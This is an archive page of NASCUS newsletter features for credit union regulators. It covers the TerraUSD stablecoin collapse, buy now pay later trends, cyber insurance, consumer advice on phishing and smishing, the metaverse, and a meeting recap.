What Happened with the TerraUSD Collapse? CRS Notes “Run-like” Risk

Previously featured articles are being migrated to the NASCUS Digital Library, cataloged by topic. For additional news, research, reports, and industry announcements featured in NASCUS Report click here.

May 19, 2022 Feature: “Run-like” Risk and Policy Proposals Noted in the Congressional Research Service Report on the TerraUSD Crash 

 

May 16, 2022 — The Congressional Research Service (CRS), a legislative agency that supports the United States Congress, has published a report (posted below) that outlines algorithmic stable coins and key factors within the TerraUSD (UST) crash. CRS describes the UST crash as a “run-like” scenario along with policy issues connected to the risk of such events.


Related Reading links/summaries below. These links cover efforts in crypto regulation legislation, lobbying efforts, and the SEC increasing “Crypto Cops” to fight digital fraud.


What Are Algorithmic Stablecoins?
Stablecoins are a type of cryptocurrency that aim to maintain a stable value. There are several classes of stablecoins that each use different methods to try to achieve this, one of which is algorithmic stablecoins. While no precise definition captures all of their features, algorithmic stablecoins typically use an algorithm or smart contract to manage the supply of tokens and guide their value to some reference asset (for example a fiat currency, such as the U.S. dollar). Algorithmic stablecoins generally do not attempt to achieve value by holding a reserve of fiat-denominated assets with a value in a 1:1 relationship with the value of the stablecoin. Instead, algorithmic stablecoins use different mechanisms to control the supply or value of the stablecoin, including the minting or burning of coins, rebasing, and arbitrage.

What Happened with TerraUSD?
TerraUSD (UST) stablecoin uses an arbitrage mechanism typical of some algorithmic stablecoin arrangements consisting of two coins or tokens: the stablecoin, in this case UST, meant to maintain a stable value or “peg,” and a balancer token, in this case,LUNA, the value of which can fluctuate. An algorithm manages the relationship between these two coins to attempt keeping the stablecoin pegged to the reference. If strong demand pushed the price of UST above its peg, arbitrageurs could buy $1 worth of LUNA, trade it for 1 UST (worth more than $1) and sell UST for a gain. If UST falls below $1, someone can buy $0.99 worth of UST and trade it for $1 worth of LUNA. In both instances arbitrageurs net a profit and ostensibly maintain the peg.

Over the past week, UST lost its peg to the dollar (Figure 1), and both UST and balancer coin LUNA were dropped from various cryptocurrency exchanges. UST hit a low of $0.12 at 9 a.m. on May 16, 2022.

Source: CoinMarketCap.

 

There are two other factors relevant to this incident.

First, Terraform Labs, the UST stablecoin manager, established Anchor, a decentralized lending protocol in which UST holders could park their UST for a reported 20% annual percentage yield. This protocol attracted demand for UST because of high yields. However, Anchor experienced sizeable UST withdrawals late last week foreshadowing the depegging. Also, in early 2022, Terraform Labs began purchasing bitcoin to hold in the Luna Foundation Guard (LFG) in response to some concerns about the peg. The LFG could sell bitcoin to prop up the stablecoin and defend the peg, which it claims to have done during the selloff but about which there is some skepticism.

Policy Issues Relating to the “Run” Risk
UST had a market capitalization of more than $18 billion in early May. Some observers voiced financial stability concerns because of UST’s contagion effects on other crypto assets and the crypto ecosystem’s interconnectedness with the traditional financial system. The sudden drop in UST’s prices reflects a classic “run-like” scenario, where a large number of investors withdraw their investments simultaneously, triggering negative feedback loops and contagion effects.

Global Financial Stability Report

Some argue that stablecoins could be subject to runs if coin holders have suspicions about the reserve assets backing the par value. The run-like behaviors already occurred for algorithmic stablecoins during relatively calm market conditions. In contrast, vulnerabilities like this are generally expected to possibly cascade and become more influential during broader market distress.

The UST event is not the first time an algorithmic stablecoin displayed run-like behavior. The Iron Titanium (TITAN) token faced a run-like scenario in June 2021 and saw its price crash to near zero within one day. Similar to how UST functions with LUNA, the algorithmic stablecoin Iron is partially supported by TITAN. Because Iron is structured using TITAN and USD Coin, when TITAN’s price collapsed, Iron was trading off the peg by more than a quarter (Figure 2).

Many observers consider the stablecoin industry as not adequately regulated. While in the traditional financial system, a run-like scenario could be somewhat mitigated by regulatory safeguards and backstops, the stablecoin industry has not incorporated such measures. For example, in the traditional financial system, bank deposit insurance and liquidity facilities could reduce market participants’ incentives to have a run. For more background, see CRS products on Stablecoins: Background and Policy Issues and How Stable Are Stablecoins?

Policy Proposals
Recent legislative proposals have considered what entities should be allowed to issue stablecoins, the reserves needed to back a stablecoin, and the disclosures that stablecoin issuers should have to make available. Committees in both the Senate and House have held hearings on stablecoins where the reserves backing these digital assets were a central issue.

With respect to reserve disclosure and composition, there have been a few recent legislative proposals. In March 2022, Representative Hollingsworth introduced H.R. 7328, which would establish auditor-verified reporting requirements for stablecoin issuers and restrict the assets that could back a stablecoin. Senator Hagerty introduced a Senate version of the bill, S. 3970, in May 2022. There have also been some discussion drafts in the House and Senate. These discussion bills provide a possible framework for stablecoin issuers. For example, while these drafts differ in their approach, they would establish institutions eligible to issue stablecoins, create disclosure requirements for the assets backing stablecoin, provide standards for the composition of those reserves, and consider avenues for financial backstops for stablecoins.

Regulators have also taken measures to address the risks associated with stablecoins. For example, in addition to the President’s Working Group report on stablecoins, the banking regulators have jointly participated in “policy sprints” focused on crypto assets, including stablecoins. Additionally, last year, the Basel Committee on Banking Supervision released a consultative document on prudential treatment of crypto exposures for public comment, and they are expected to finalize their consultative framework this year. The Department of the Treasury is reportedly working on a report on TerraUSD.


Related Readings:

  • Cryptocurrencies Melt Down in a ‘Perfect Storm’ of Fear and Panic: A steep sell-off that gained momentum this week starkly illustrated the risks of the experimental and unregulated digital currencies.
    The price of Bitcoin plunged to its lowest point since 2020. Coinbase, the large cryptocurrency exchange, tanked in value. A cryptocurrency that promoted itself as a stable means of exchange collapsed. And more than $300 billion was wiped out by a crash in cryptocurrency prices since Monday. The crypto world went into a full meltdown this week in a sell-off that graphically illustrated the risks of the experimental and unregulated digital currencies.
  • U.S. Senate Crafting Crypto Regulatory Legislation
    A bipartisan group of U.S. senators plans to release a long-sought framework for regulating the volatile cryptocurrency market next week amid signs of market chaos. The group will release the draft for public comment and introduce a formal bill as soon as 30 days afterward, according to Sen. Cynthia Lummis (R-WY), who said she will sponsor the legislation along with Sen. Kirsten Gillibrand (D-NY) and several other senators, joining at least one other crypto bill floating around the Senate, that one introduced by Sen. Pat Toomey (R-PA).
  • U.S. Crypto Lobbyists in Push to Contain Fallout from Stablecoin Meltdown
    The Blockchain Association and the Chamber of Digital Commerce, which represent some of the most influential crypto companies, say they have been fielding a flurry of questions from Capitol Hill since TerraUSD, known as “UST,” broke its peg last week and crashed 90%. Capitol Hill lawmakers have been quizzing lobbyists on the structure of UST, seeking to determine whether its collapse was preventable and if other stablecoins could suffer the same fate.
  • SEC to Hire More Cryptocurrency Cops to Fight Digital FraudsThe Securities and Exchange Commission will boost the size of its special unit devoted to investigating cryptocurrency frauds and other misconduct, a move that follows the agency’s aggressive push to get the unregulated industry to come under federal supervision. The commission has positioned itself as the chief government bulwark against fraud in the $1.7 trillion market, which so far has sidestepped most federal consumer- and investor-protection rules. SEC Chairman Gary Gensler says the crypto industry is rife with fraud and abuse, likening it to the “Wild West.”

 

May 13, 2022 Feature:
2022 Buy Now, Pay Later Apps, Trends & Statistics

If any payment option has ‘become trendy,’ it would be buy now, pay later (BNPL).
Unfortunately, in a recent article, 45% of survey respondents use BNPL to make purchases that don’t fit within their budget. This feature explores current patterns, trends, and statistics on app usage/purchase patterns, spending habits, and generational breakouts.

Related Reading:


According to NerdWallet’s Jackie Veling, these are the top 6 BNPL apps in 2022 recommended to their readers:

  1. Afterpay: Best for no credit check. Unlike most BNPL providers, Afterpay doesn’t interact with the credit bureaus. The lender will not conduct a soft credit pull on your application or report on-time or missed payments to the bureaus.
  2. Affirm: Best for large purchases. Affirm operates as a more traditional loan product. It offers longer terms and negotiates the interest rate with each retailer. If you’re looking to fund a larger purchase, like a mattress or computer, an Affirm loan may have more affordable payments spread out over a longer period.
  3. Klarna: Best for earning rewards. Klarna offers three payment plans, including the popular pay-in-four model, its Pay in 30 model and a monthly financing option. After downloading the mobile app, users can join Vibe — a free rewards program with access to exclusive sales. The program awards one vibe per dollar spent, and vibes can be turned into rewards, like gift cards.
  4. Zip (formerly Quadpay): Best for wide availability. Zip, formerly known as Quadpay, is available anywhere Visa is accepted. After downloading the mobile app, you can pay with your debit or credit card or generate a virtual Zip card that can be used in stores.
  5. PayPal Pay in 4: Best for peace of mind. PayPal offers a BNPL payment plan to users who have a PayPal account and are in good standing. Along with the name recognition that may put new BNPL users at ease, the company extends its PayPal Purchase Protection to its BNPL plan. That means if you don’t receive your item or it’s different from the description, you may qualify for reimbursement from PayPal.
  6. Sezzle: Best for socially conscious shoppers. If you want your BNPL dollars to go further, Sezzle might be a good option. Sezzle is a certified B Corporation, a designation that required the lender to pass a rigorous assessment and show a demonstrated commitment to social and environmental issues. This feature is unique among BNPL lenders.

Read more from NerdWallet here.


“More than 30 Buy Now, Pay Later Trends & Statistics for Banks in 2022”
Courtesy of Garret Reich, The Financial Brand

BNPL Growth Projections

The number of U.S. buy now, pay later users is projected to soar from 1.6 million in 2018 to 59.3 million in 2022, driven by innovations in credit access and purchase flexibility. Growth will likely taper through 2025, however, as BNPL enters a post-regulation maturity phase.1

  • BNPL offerings will account for an impressive $680 billion in transaction volume worldwide in 2025.2
  • Buy now, pay later usage is expected to increase by 20.7% between 2021 and 2028.3
  • U.S. BNPL transaction volume is projected to surpass the $100 billion mark annually by 2024, up from $55 billion in 2021.4
  • BNPL payments are expected to account for nearly a quarter of all global ecommerce transactions by 2026, up from just 9% in 2021.5

Why Customers Buy with BNPL

The most common reason to use buy now, pay later services is to make purchases that don’t fit in one’s budget — 45% of respondents have used it for this reason.6

Why customers use BNPL versus credit cards

  • Buying electronics is the most common use of buy now, pay later, with nearly half (48%) of BNPL users saying they’ve used it for that reason.6
  • 71% of Americans who visit the dentist frequently would use BNPL over traditional payment methods.7
  • 86% of pet owners would choose BNPL in place of traditional payment methods to help pay for future vet costs.7

How Often People Turn to BNPL

  • Nearly three out of five buy now, pay later users (56%) prefer BNPL to credit cards.8
  • 38% of users say buy now, pay later will eventually replace their credit cards.6
  • Two in three Americans are more interested in BNPL in 2022 than before the pandemic.7
  • Of consumers who use BNPL services, nearly three out of ten people (29%) use it at least once a month. 51% of people use buy now, pay later services once every three to six months.8

How often people use BNPL services when shopping online

  • Of people who use BNPL, over two thirds (67%) use BNPL when shopping online at least half the time.8
  • 53% of respondents who have never used buy now, pay later say they’re at least somewhat likely to use it within the next

A Deeper Look Into the Consumers Using BNPL

  • The average amount of the last item BNPL users purchased was $689.8

People don’t open buy now, pay later contracts one at a time. Any one BNPL user is paying for an average of four items (3.8) at any given time.8

How much consumers spend each month on BNPL payments

  • 61% of buy now, pay later users would rather use a BNPL service offered directly from the retailer they’re buying from than go through a third party.6
  • People whose buy now, pay later behavior was included in credit scoring models saw an average credit score improvement of 13 points. People with credit records of two years or less saw a greater increase, on average 21 points.11

year.6

Demographics of BNPL Customers

More than 45 million people age 14 and older in the U.S. were expected to use buy now, pay later services by the end of 2021.12

Usage of buy now, pay later providers, by generation

  • 44% of Gen Z is predicted to use BNPL at least once in 2022. That compares to 37% of Millennials, 23% of Gen Z and 9.4% of Baby Boomers.12
  • By 2025, it nearly 30% of BNPL users will comprise Gen X and Baby Boomers.12
  • 10% of Gen Z say they would use buy now, pay later for a $500 purchase.13
  • Buy now, pay later users age 18 to 24 are the most likely to pay $250 or more per month when they have a BNPL payment.6

Sources:1 eMarketer, 2 Insider Intelligence, 3 EY, 4 Mercator, 5 Juniper Research, 6 Ascent, 7 OPY, 8 C+R, 9Woolard Review, 10 Nerdwallet, 11 Equifax, 12 eMarketer, 13 Alliance Data Systems

Click here to read the entire article

 

May 6, 2022 Feature: Cyber Insurance Experts Discuss Emerging Market Trends in Attacks and Coverage

Courtesy of Stephen Lawton, Sophos

Experts included Marc Schein, national co-chair of the Cyber Center of Excellence at the world’s largest insurance broker, Marsh McLennan Agency (MMA); James Tuplin, head of international at next-gen speciality insurer Mosaic Insurance; Natalie Graham, head of claims at Mosaic Insurance; Daniel Kasper, cyber risk researcher and economist at Cyber Economics; and Nicholas Cramer, senior director of global cyber risk partnerships at Sophos.

Watch on-demand discussion here.

Related readings:

Experts Offer Advice on Cyber Insurance Trends, Qualifying for Coverage

Qualifying for a cyber insurance policy today can be a challenging and tedious process. Gone are the days when a simple phone call to an insurance agent and selecting coverage limits lead to obtaining a policy. Today, due to the sharp increase in ransomware attacks and multimillion-dollar payouts, along with stricter cybersecurity controls required by underwriters, obtaining cyber insurance is now an essential objective and corporate imperative for organizations, but not a certainty.

The Economics of Cyber Insurance

Laying the baseline for emerging trends in the cyber insurance market, Schein said the cost of insured cyberattacks grew by 22% in 2020 and 77% in 2021, but rates for cyber insurance grew much faster. In September 2021, the average rate increase was 128% while the capacity offered — the limits insurance companies were willing to offer — dropped by 23%. The combination of higher rates and reduced coverage effectively is driving up the cost of insurance significantly, he said.

Economist Kasper agrees. The honeymoon that organizations had obtaining cyber insurance at a relatively low price for hefty amounts of coverage are likely gone forever. Now that insurers have had a chance to better judge the market dynamics, as well as judging the relative levels of cyber security controls in place by many of the organizations seeking insurance, the stark realities are coming into focus, and it is not good news for those who are shopping for policies.

“In 2013, we had about a billion dollars in global insurance premiums in cyber,” Kasper said. The next six years the market grew by roughly 30% annually, but at the end of 2019 COVID-19 hit and ransomware skyrocketed.”

Looking at 2018 before ransomware attacks became so prevalent, he said, a cyber insurance carrier would have significantly underpriced the premium cost for a cyber insurance policy for 2019 because the carriers did not have the threat vector for the new ransomware attacks in the pricing model. The market is now addressing those losses in pricing changes.

“We are now in the renewals for 2021 and 2022 and from everything that we have heard so far on the market this year, in 2023, it will be even harsher,” Kaspar said. “It is now a seller’s market.”

If organizations want to buy cyber insurance today, they must show proactive cybersecurity preparations beyond what they had “three or four years ago when you got basically cyber insurance, sometimes even without any security scans or any meaningful information that you had to divulge,” he added.


Rising Rates for Less Coverage

Schein told the attendees that “perhaps the most talked about conversation within cyber risk today is around systemic types of loss and systemic risk.”  He noted that an increased awareness of supply-chain based attacks are causing volatility in the market. Attacks such as SolarWinds, cybercriminals breaching Microsoft Exchange, and log4j “started to cause havoc for the insurance marketplace.”

To qualify for cyber insurance today, Schein emphasized the need to put in place 12 security controls that address very basic cyber security. These controls are “absolutely critical for businesses that are looking to apply for insurance and or increase the current limits that they currently have. And then from a coverage standpoint, we’ve spoken about carriers are now starting to scale back coverage. The market is starting to harden and you’re starting to see prices increasing.”

The first five controls, highlighted in orange, are essential before MMA will sit down with a prospective client, he said. The other seven controls also are crucial, but MMA will consider submitting an insurance policy to underwriters even if not every blue control is in place.

That said, cyber insurance carriers simply will not offer a policy if the prospect is not willing to put forth the effort to reduce their risk. “[Cyber insurance carriers] can’t charge enough to make up for poor [security] controls,” he said.


Business Interruption

While brokers such as MMA have their own requirements to consider before submitting an insurance application to underwriters, it is the carriers for whom the underwriters work and who decide if an application is approved or not.

Mosaic’s Tuplin said most insurers find that organizations seeking insurance are most concerned about business interruption first due to ransomware and then data breaches or misuse of data. In order to identify the appropriate policy for a prospective customer, Tuplin said Mosaic uses three core triggers to determine the coverage the cyber insurance policy offers.

The first trigger is security failure, which is the inability of your IT security to stop an event. An example of a security failure is a virus that stops your system from working correctly. Taking security failure to the next level, you come to the second trigger: system failure. An example of system failure is turning on your computer, but nothing happens at all, he said. The third trigger, which formerly was part of system failure but now is a discrete trigger, is ransomware.

“We’ve split that out as an industry so that insurers can choose whether to include or exclude that as a trigger within their policies,” Tuplin said. “It will make your policy more expensive to include it, but it’s generally the area you want to cover most.”

The base area of coverage in a cyber policy is if it affects the organization’s own IT systems, he noted. That would include software that runs on-premises on workstations and servers, as well as networking equipment. The second level of coverage addresses key partners’ systems — an outsourced IT system. This could include cloud services or perhaps a payment system for a retail customer.

“What you have to think about is if an event such as a virus affects that payment processor, rather than affecting your own IT systems,” Tuplin said. “Do you want that to be covered within your policy? It is an extension of coverage, but it is a very important one and it is one that most people do opt to purchase.”

The third area is the most extreme version of business interruption — an interruption to any service provider’s operations. He used the example of an automobile manufacturer who was unable to obtain specific parts because of a cyberattack on that partner’s manufacturing operations. A car manufacturer cannot ship a car without breaks, so such a business continuity interruption due to an attack on a third party directly that impacts the ability for the insured to make its products is a covered event.


Data Breaches

A data breach simply refers to information that should have been private is now disclosed and perhaps public. Tuplin used credit card data, legal documents, healthcare records and passport information as common types of private data that is obtained by someone who is not supposed to have the data. Private data that is made public or is stolen triggers the data breach element of a cyber insurance policy, he noted.

Data misuse is another component of a breach. If the owner of private data tells a company not to disclose or sell their private data but the company does so anyway, that disclose triggers the data breach portion of a cyber policy as well.

“We don’t care how the data was breached, cyber policies will cover it,” he said. Beyond how the data was compromised, the cyber insurance policy is not concerned where the data was breached. The policy will pay if you store data on your server or in the cloud. Each misuse still triggers the policy, he noted.

When triggered, the policy covers notification costs, which can be quite expensive. Both the European Union’s General Data Protection Regulation (GDPR) and the U.S. Health Insurance Portability and Accountability Act of 1996 (HIPAA) require informing anyone whose personally identifiable information (PII) has been compromised.

Cyber insurance also generally pays for investigating and identifying how an attacker got into the network and if they are still there. It also pays for identifying exactly what was compromised and reporting to regulators. Insurance companies generally have teams of attorneys who step in to handle all the required legal work from disclosure to reporting to handling covered lawsuits.

In some jurisdictions, where the practice is legal, the insurance company might also pay any extortion fees. That can be problematic in such countries as the United States and Italy where government regulations do not permit payments to sanctioned organizations, which could include organized crime, foreign criminal organizations and some foreign state-sponsored groups and terrorists.

Tuplin noted that it can be difficult to determine at first blush the kinds of data a company needs to protect. He cited the example of a small company that had just a handful of employees with roughly £4.5 million in sales, but the company had data on more than half of the population of Great Britain. When a company takes out a policy to protect its most important data, it is essential to know exactly what that entails. In the case of this small British firm, he said, it would be the database with the pertinent information on the citizenry that was the company’s core data.

Being clear on exactly what your organization needs to protect will go a long way to ensure that your cyber insurance policy is written so that it covers exactly what you need protected.


Paying Claims

Cyber insurance, like other business functions, is shrouded in its own myths. One popular story, according to Mosaic’s Graham, is that organizations do not need cyber coverage because their other insurance will cover cyber events. That generally is not accurate, she said.

While some policies might have a small amount of cyber coverage, it normally is insufficient to meet the very high costs related to cyberattacks. Popular business coverage, such as errors and omissions, key person insurance, general liability, commercial property and other kinds of business policies simply are not designed to meet the specific needs of a cyber insurance policy.

“Other than a standalone cyber insurance policy, there is no other policy that will cover you for data breaches data, misuse, ransomware, malware, everything that we’ve talked about,” she said.

It is important to notify the insurance company if there is a breach or ransomware attack, even if the company plans to cover the loss themselves. During the investigation and mitigation process, the investigators might find additional damage the organization was not aware of from the attack. Additionally, all discussions with attorneys are protected by attorney/client privilege so no secrets can be disclosed in case of a lawsuit.

Another myth Graham dispelled is that insurance companies do not pay claims for cyberattacks. That, she said, is simply incorrect, as is the notion that filing a claim is difficult. “If you avail yourself of the tools that are available, it is straightforward,” she said.

“Ransomware is far and away the largest cause of cyber claims at the moment,” Graham added. “It is prevalent, but the cyber insurance does cover it. Ransomware itself can also be accompanied by data breaches.”

If an attacker installs ransomware and at the same time steals data and essentially hold that data to ransom, you have two actions — introduction of ransomware and a data breach with extortion. However, she noted, they are not necessarily two totally distinct events.

A lot of organizations think, “I don’t need cyber insurance because my environment is secure,” Graham continued. “But it isn’t just your environment that you need to be concerned about, she noted. While your environment might be safe, you still need to be concerned with your third-party suppliers and services and other organizations that that that you rely on to carry out your business. So, if any of those are hit by any kind of incident, then it can have a knock on effect.”

Hoping to put at rest the concern that cyber insurance was an unnecessary expense, she noted: “If you suffer a cyber event, you will be covered. And your insurance company, as long as they are reputable, will pay.”


 

April 29, 2022 Feature:
Think It Can’t Happen to You?
Spoofing, Phishing, and Smishing

Related Readings:


Social Media a Gold Mine for Scammers
According to a data spotlight authored by the Federal Trade Commission, “Social media permeates the lives of many people – we use it to stay in touch, make new friends, shop, and have fun. But reports to the FTC show that social media is also increasingly where scammers go to con us. More than one in four people who reported losing money to fraud in 2021 said it started on social media with an ad, a post, or a message. In fact, the data suggest that social media was far more profitable to scammers in 2021 than any other method of reaching people.

Social FraudMore than 95,000 people reported about $770 million in losses to fraud initiated on social media platforms in 2021. Those losses account for about 25% of all reported losses to fraud in 2021 and represent a stunning eighteen-fold increase over 2017 reported losses. Reports are up for every age group, but people 18 to 39 were more than twice as likely as older adults to report losing money to these scams in 2021.

For scammers, there’s a lot to like about social media. It’s a low-cost way to reach billions of people from anywhere in the world. It’s easy to manufacture a fake persona, or scammers can hack into an existing profile to get “friends” to con. There’s the ability to fine-tune their approach by studying the personal details people share on social media. In fact, scammers could easily use the tools available to advertisers on social media platforms to systematically target people with bogus ads based on personal details such as their age, interests, or past purchases.”


Fishing with Fake Accounts
Courtesy of Rachel DePompa and Daniela Molina, Gray Media Group, Faked Out: Con artists copycatting social media profiles lure family and friends into scams”

Your pictures, your videos, your memories – all come together to create your social media identity. The authors have uncovered scammers targeting your online accounts to create a whole new you, all designed to scam your closest friends out of their money.

In the tech world it’s called “spoofing,” a hacking technique where scammers take your online content and create a duplicate fake profile with the goal of drawing your friends and followers into a web of deceit.

According to Facebook’s transparency page, in late 2021 around five percent of monthly active users worldwide were fake, which means there were around 140 million fake accounts at any given time. Meta, Facebook and Instagram’s parent company, said it took action against 1.7 billion fake Facebook accounts during that same time.

How can you protect yourself: Report the duplicate account to the social media company and follow the steps listed on its website.

  1. Go into Settings and make your account private (for the time being)
  2. Set up two-factor authentication on all your social media devices
  3. Freeze your credit (even your dependents and children too)
  4. Report identity theft to the IRS to prevent hackers from committing crimes under your name

Baiting with Bitcoin

James Lee, COO of Identity Theft Resource Center (ITRC), said once scammers create the fake account, they will post on Instagram about Bitcoin investments to attract other users. Anyone who clicks on certain links in that post automatically shares their credentials. At that point, hackers can step in and message the followers of anyone who clicked on the link to join the Bitcoin scam.

According to cybersecurity firm Digital Shadows, the cost of a hacked Instagram account on the dark web is $45. ITRC said it received 316 complaints about social media account takeovers in 2021. Already in 2022, the organization has seen 201 complaints, an 11% increase from this time last year.


Smishing: Phishing with a Different Bait
Courtesy of David Lott, Federal Reserve of Atlanta

The Retail Payments Risk Forum team is always on the lookout for changes in attack patterns by the criminal element regarding payments. Our sources of research include industry news, networking with payments stakeholders, third-party reports, and our internal security warnings. One other source we have is our own personal experience.

Unlike phishing, which uses email, smishing uses SMS text messages to entice you to click on a malicious link that either loads malware on your phone or, more likely, directs you to a fake website to capture your login information. (Simply opening the text message poses little risk.)

A cybersecurity firm that claims to handle 80 percent of mobile messages in North America has reported that the number of smishing attacks during the third quarter of 2020 had increased 328 percent over the previous quarter. The FBI’s Internet Crime Complaint Center (IC3) doesn’t separate smishing from phishing, vishing (phone calls), or pharming (redirection to a fake website) incidents, but the IC3’s Internet Crime Report 2021  shows that these complaints increased 34 percent from 2020 to 2021.

The warning signs for a smishing message are quite similar to those of a phishing attack and may include the following:

  • A sense of urgency, pushing you to respond right away. As we are now in income tax season, these messages may include references to past due taxes or a suspended refund.
  • An offer of a reward such as a gift card, rebate, or a coupon for a future purchase from the retailer
  • Poor English grammar or improperly formatted phone numbers
  • An unknown sender. It is best to report or delete messages you weren’t expecting from people you don’t know.

Be aware that what appears to be the sender’s phone number is often spoofed. It may be a familiar number or at least may have a local area code. This is intended to increase your trust and thus the likelihood that you will respond.

Likewise, the protective measures you should take to protect yourself against falling victim to a smishing attempt are similar to any other safeguards you take:

  • Keep your mobile device software and browsers updated with the latest security upgrades.
  • If you are in doubt about the legitimacy of the message, do not use the link or phone number provided in the text to contact the sender. If the message appears to be from someone you know or a business you are familiar with, find their number in your contacts or online and contact them directly.

Phishing During the Great Resignation: LinkedIn Accounts for Half of all Phishing Attempts Worldwide
Courtesy of the Check Point Blog 

Check Point Research issued its Q1 Brand Phishing Report, highlighting the brands that hackers most often imitate to lure people into giving up their personal data and highlights the brands which were most frequently imitated by criminals in their attempts to steal individuals’ personal information or payment credentials during January, February and March 2022.

Social media networks have now overtaken shipping, retail and technology as the category most likely to be targeted by criminal groups.

So far this year, LinkedIn has been related to more than half (52%) of all phishing-related attacks globally, marking the first time the social media network has reached the top of rankings. It represents a dramatic 44% uplift from the previous quarter, when LinkedIn was in fifth position and related to only 8% of phishing attempts. LinkedIn has now overtaken DHL as the most targeted brand, which has now fallen to second position and accounted for 14% of all phishing attempts during the quarter.

Top phishing brands in Q1 2022

Below are the top brands ranked by their overall appearance in brand phishing attempts:

  1. LinkedIn (relating to 52% of all phishing attacks globally)
  2. DHL (14%)
  3. Google (7%)
  4. Microsoft (6%)
  5. FedEx (6%)
  6. WhatsApp (4%)
  7. Amazon (2%)
  8. Maersk (1%)
  9. AliExpress (0.8%)
  10. Apple (0.8%)

Check Point Illustrates an emerging trend toward threat actors leveraging social networks, now the number one targeted category ahead of shipping companies and technology giants such as Google, Microsoft and Apple. As well as LinkedIn being the most targeted brand by a considerable margin, WhatsApp maintained its position in the top ten, accounting for almost 1 in 20 phishing-related attacks worldwide.

 

 

April 22, 2022 Feature: What is the Metaverse?

 

The Metaverse, Explained for People Who Still Don’t Get It
Courtesy of Shamani Joshi, Vice.com

Companies building each layer of the Metaverse. Click to expand.

Is it just a buzzword, the next internet, a video game, or an idea? We asked experts to break it down for us.
Whether you’ve come across Mark Zuckerberg’s eerie virtual replica as he unveiled Facebook-rebranded-as-Meta (we’re not getting used to this name any time soon though), live concerts in the immersive Fortnite universe, or a digital art gallery in Decentraland – there’s no escaping the internet’s favorite buzzword: the “Metaverse.”

But what even is this metaverse? Is it a virtual universe with endless possibilities we can escape into? Is it the dystopian future of the internet built on speculative sci-fi? Or is it just a fancy way of categorizing extended reality (XR) – an umbrella term encompassing augmented, virtual, and mixed reality technologies?

Talking about the metaverse feels a lot like talking about the internet back in the 70s and the 80s. As the building blocks of the new form of communication were being laid down, it sparked speculation around what it would look like and how people would use it. Everyone was talking about it but few knew what it really meant or how it would work. Looking back, it didn’t turn out exactly as some people imagined.

However, with the metaverse pegged to become an $800 billion market by 2024, and with tech giants like Facebook, er, Meta, Microsoft, Apple and Google investing big money in making it a reality, it’s time to find out what this vague and complex term means.

So, we got a bunch of experts to break it down for those who still don’t get what the metaverse is all about, AKA most of us.


So, what exactly is the metaverse? 

While the term has been floating around for the last few years, the word “metaverse” was actually coined by author Neal Stephenson in his 1992 sci-fi novel Snow Crash. In his book, Stephenson referred to the metaverse as an all-encompassing digital world that exists parallel to the real world. But in 2022, experts still aren’t sure whether the metaverse IRL could evolve into something similar.

“The metaverse is a 3D version of the Internet and computing at large,” Mathew Ball, a venture capitalist and angel investor who’s written a series of essays about the potential and structures of the metaverse, told VICE.

According to Ball, there are two ways to place this in the current context.“When these two technologies (internet and computing) first emerged, all interactions were primarily text-based (emails, messages, usernames, email addresses). Then they slowly became more media-based (photos, videos, livestreams). The next elevation of user interface and user experience is into 3D. Secondly, if we think of [a] mobile [phone] as placing a computer in our pocket and the internet being available at all times, think of the metaverse as always being within a computer and inside the internet.”

Many experts look at the metaverse as a 3D model of the internet. Basically, a place parallel to the physical world, where you spend your digital life. A place where you and other people have an avatar, and you interact with them through their avatars. Some also argue that the metaverse in the truest sense of the term doesn’t actually exist yet.

“It’s not real at this stage, and won’t become real until people have a single location they can go to to get into in a virtual world they could live in,” Ibrahim Baggili, a cybersecurity expert and the founding director of the Connecticut Institute of Technology at the University of New Haven, told VICE.

Essentially, the metaverse is supposed to be a 3D version of the internet that is seen as the logical next stage of development, and would ideally be accessed through a single gateway.

“The internet was described as an ’information superhighway’ in the 90s, but it was more of just a term to refer to a potential future with networked computers rather than an actual highway,” said Timoni West, a vice president who oversees the AR and VR departments at Unity Software, a company that builds graphics engines for game development. “As it develops, the metaverse will also have equivalence to the real world and be much more distributed, democratic, fluid and varied,” she told VICE.

While the discourse on defining the metaverse differs from case to case, it is, in the simplest terms, a shared virtual space that is interactive, immersive and hyper-realistic. It would also include your own customized avatar and digital assets, which will likely be recorded on a blockchain.


So, what is the use of the metaverse, really?

Given its high-value projection, the metaverse is touted as a major player in growing the digital economy. “The metaverse will grow the digital economy, which is the primary growth driver of the world economy,” said Ball.

But while the metaverse is already being seen as the future of entertainment, fashion, gaming and even partying, experts argue that its best-case use will likely be for education. “Just like how you’d understand dissection much better by actually performing it rather than just reading about it, 3D-based education is likely to be much better than, say, schooling over Zoom,” Ball said.Baggili agrees. “Buying virtual countries that don’t exist in the real world could be an investment opportunity for making a quick buck, but the real value of the metaverse is when it’ll be used in ways that bring value to people’s lives [beyond money].

”As an experiment, Baggili taught his students a class on forensics using VR headsets. “It was effective in terms of documenting a crime scene and creating a consistent environment you can save for later. But eventually, even my students’ eyes got tired and it became difficult to work on the computer,” he said. “So while there are scenarios where the technology and implementation can be useful – such as an augmented reality setup to train car mechanics or to help someone remotely fix an elevator they are stuck in – it still needs some work.”

Click here to read the article in its entirety. 

 

April 15, 2022 Feature: National Meeting for State Regulators

Click here for a sneak peek at the event photo gallery.

Photos can be downloaded and shared from the photo gallery. A full set of images will be available in next week’s NASCUS Report.


National Meeting Recap

Hosted in sunny San Diego, the National Meeting for State Regulators brought together more than 100 participants from across the country to network, learn and collaborate on the industry’s most pressing issues.


Working Together – Building Relationships

One of the benefits of attending the National Meeting is the ability to network and collaborate with other state agencies across the country. In addition to working within the state system, regulators need to collaborate with federal-level agencies as well. As a result, NCUA Chairman Todd Harper and NCUA Executive Director Larry Fazio participated in two separate sessions focused on building relationships and streamlining collaboration within overlapping priorities. During the three days of discussion, attendees expressed significant concern of two primary areas that affect everyone within the industry: evolving technologies/crypto and cybersecurity/ransomware attacks.

Evolving Technologies

In a world of “crypto-curious” entities (businesses and individuals), state supervisors need to define rapidly evolving technologies and determine the best approaches and regulation practices.

For example, in a presentation by Joseph Vincent, regulators learned about four separate categories of distinction within the digital asset spectrum, from decentralized to centralized. This includes 100% decentralized stablecoins [i.e., Ethereum] in Permissionless Public Shared Networks; to Permissioned, Public Shared Systems, [i.e., Ripple (XRP)]; to Permissioned Private Shared Systems [i.e., JPMorgan Coin]; and the 100% Centralized Ledger System [i.e., Digital Yuan and other Central Bank Digital Currencies].

